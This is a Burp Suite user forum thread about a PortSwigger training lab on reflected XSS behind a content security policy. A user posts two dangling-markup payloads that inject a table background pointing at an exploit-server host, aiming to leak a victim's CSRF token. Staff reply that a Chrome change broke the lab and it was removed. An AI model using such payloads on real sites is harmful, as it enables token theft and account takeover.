Burp Suite User Forum

Create new post

Lab Reflected XSS protected by CSP, with dangling markup attack

Taib | Last updated: Feb 14, 2022 09:03AM UTC

Hello there could you verify that the solution of this lab is still working ? https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-with-dangling-markup-attack i tried both of thease payloads to get the victims csrf using colaborator and the exploit server none is working script 1 <body> <script> let form = document.createElement('form'); form.action='https://ac621fc21f9c8335c0cf1e9f00610001.web-security-academy.net/my-account'; let input = document.createElement('input'); input.name = 'email'; input.value = '"><table background=\'//exploit-ac2a1f6d1f2383cec0621e37015c0015.web-security-academy.net/?'; form.append(input); document.body.appendChild(form); form.submit() </script> </body> script2 : <script> location = 'https://ac621fc21f9c8335c0cf1e9f00610001.web-security-academy.net/my-account/?email=%22%3E%3Ctable%20background=%27//exploit-ac2a1f6d1f2383cec0621e37015c0015.web-security-academy.net?'; </script>

Ben, PortSwigger Agent | Last updated: Feb 15, 2022 05:58PM UTC

Hi Taib, We are aware of an issue with this particular lab whereby an update to Chrome (here - https://chromestatus.com/feature/5735596811091968) means that the lab itself is no longer solvable. Due to this, we have now actually removed the lab from the Web Academy so that users are not wasting their time attempting to solve what is now an unsolvable lab.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.